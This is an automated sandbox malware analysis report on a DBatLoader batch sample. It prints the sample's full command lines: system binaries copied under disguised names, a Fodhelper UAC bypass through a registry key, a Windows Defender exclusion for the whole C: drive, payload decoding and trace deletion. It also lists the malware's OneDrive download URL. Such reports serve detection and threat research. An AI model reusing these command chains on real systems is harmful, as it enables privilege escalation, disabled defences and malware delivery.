
Windows Analysis Report
rPO767575.cmd

Overview

General Information

Sample name: rPO767575.cmd
Analysis ID: 1515085
MD5: 5e052709f9e7b0b0ea90de7b99b8cc43
SHA1: 88c7a864f7329bddc022736ab869708792e3dd91
SHA256: 1f4f6c2f96f8ceae07c5abfa215a95a6788ec2e74c6a941c94c54dbca211ba69
Tags: cmd, user-Porcupine

Detection

DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 3068 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 5792 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5816 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5316 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 4520 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 5824 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7124 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 5976 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 3020 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 4940 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 3800 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6680 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 3364 cmdline: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6820 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • xkn.exe (PID: 6528 cmdline: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • alpha.exe (PID: 4788 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • ger.exe (PID: 4128 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • alpha.exe (PID: 2300 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 4508 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • per.exe (PID: 4932 cmdline: "C:\\Windows \\System32\\per.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
    • alpha.exe (PID: 7248 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7288 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • Ping_c.pif (PID: 7348 cmdline: C:\Users\Public\Libraries\Ping_c.pif MD5: 66561F313D11178EEE1955CE46E4CEA0)
    • alpha.exe (PID: 7372 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7392 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7412 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7428 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7444 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7460 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7504 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7520 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • SystemSettingsAdminFlows.exe (PID: 7340 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • cleanup
{"Download Url": ["https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0"]}
Source: rPO767575.cmd
Rule: MALWARE_BAT_KoadicBAT
Description: Koadic post-exploitation framework BAT payload
Author: ditekSHen
Strings:
  • 0x2:$s1: &@cls&@set
  • 0x59:$s2: :~12,1%%
  • 0x64:$s2: :~48,1%%
  • 0x6f:$s2: :~55,1%%
  • 0x7a:$s2: :~30,1%%
  • 0x85:$s2: :~34,1%
  • 0x95:$s2: :~46,1%%
  • 0xa0:$s2: :~21,1%%
  • 0xab:$s2: :~19,1%%
  • 0xb6:$s2: :~22,1%%
  • 0xc1:$s2: :~38,1%%
  • 0xcc:$s2: :~60,1%%
  • 0xe0:$s2: :~54,1%%
  • 0xeb:$s2: :~15,1%%
  • 0xf6:$s2: :~17,1%%
  • 0x101:$s2: :~2,1%%
  • 0x10b:$s2: :~0,1%%
  • 0x115:$s2: :~28,1%%
  • 0x120:$s2: :~49,1%%
  • 0x12b:$s2: :~6,1%%
  • 0x135:$s2: :~5,1%%
Source: 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_DBatLoader
Description: Yara detected DBatLoader
Author: Joe Security

Source: 31.2.Ping_c.pif.2940000.0.raw.unpack
Rule: JoeSecurity_DBatLoader
Description: Yara detected DBatLoader
Author: Joe Security

Source: 31.2.Ping_c.pif.2940000.0.unpack
Rule: JoeSecurity_DBatLoader
Description: Yara detected DBatLoader
Author: Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\\Windows \\System32\\per.exe" , CommandLine: "C:\\Windows \\System32\\per.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\per.exe, NewProcessName: C:\Windows \System32\per.exe, OriginalFileName: C:\Windows \System32\per.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\\Windows \\System32\\per.exe" , ProcessId: 4932, ProcessName: per.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " , ProcessId: 5792, ProcessName: alpha.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 5316, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 4520, ProcessName: extrac32.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 6820, ProcessName: alpha.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 13.107.137.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Ping_c.pif, Initiated: true, ProcessId: 7348, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\Ping_c.pif, CommandLine: C:\Users\Public\Libraries\Ping_c.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ping_c.pif, NewProcessName: C:\Users\Public\Libraries\Ping_c.pif, OriginalFileName: C:\Users\Public\Libraries\Ping_c.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\Ping_c.pif, ProcessId: 7348, ProcessName: Ping_c.pif
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 6528, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suyjvk0i.1uq.ps1
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 6820, ProcessName: alpha.exe
Source: Process started | Author: frack113 | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 6820, ProcessName: alpha.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\Public\Libraries\Ping_c.pif | Avira: detection malicious, Label: TR/AD.Nekark.qzqtk
Source: 31.0.Ping_c.pif.400000.0.unpack | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0"]}
Source: rPO767575.cmd | ReversingLabs: Detection: 50%
Source: rPO767575.cmd | Virustotal: Detection: 43%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.8% probability
Source: C:\Users\Public\Libraries\Ping_c.pif | Joe Sandbox ML: detected
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F62C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,9_2_00007FF607F62C2C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F62F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF607F62F38
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF8940
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FFC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,9_2_00007FF607FFC940
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F7C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF607F7C960
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608022994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,9_2_00007FF608022994
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FB29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF607FB29A0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF099C BCryptOpenAlgorithmProvider,#205,#359,#359,9_2_00007FF607FF099C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF60802A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF60802A9F0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FBE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,9_2_00007FF607FBE9F0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FDAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,9_2_00007FF607FDAA00
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,9_2_00007FF607FF4A1C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF0A18 BCryptSetProperty,#205,#359,#357,#357,9_2_00007FF607FF0A18
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FD4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,9_2_00007FF607FD4A34
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F66A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,9_2_00007FF607F66A84
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FDEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,9_2_00007FF607FDEA7C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608022A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,9_2_00007FF608022A78
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF8AA0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,9_2_00007FF607FF0ABC
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,9_2_00007FF607FF2AE4
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F92B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,9_2_00007FF607F92B00
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FE8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF607FE8AFC
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF60805EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,9_2_00007FF60805EB38
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,9_2_00007FF607FF0B80
